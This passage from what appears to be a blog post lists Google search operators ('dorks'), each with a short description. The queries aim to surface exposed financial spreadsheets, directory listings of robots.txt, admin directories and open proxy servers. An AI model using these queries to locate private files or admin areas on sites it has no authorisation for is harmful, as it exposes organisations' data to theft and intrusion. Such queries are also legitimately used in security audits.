Description- Secret financial spreadsheets 'finance.xls' or 'finances.xls' of companies may revealed by this query.
Google Search :- intitle:"index.of" robots.txt
Description- The robots.txt file contains "rules" about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff. However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!
Google Search :- intitle:index.of.admin
Description- Locate "admin" directories that are accessible from directory listings.
Google Search :- inurl:"nph-proxy.cgi" "start browsing"
Description- Returns lots of proxy servers that protects your identity online.
Subscribe to:
Comments (Atom)
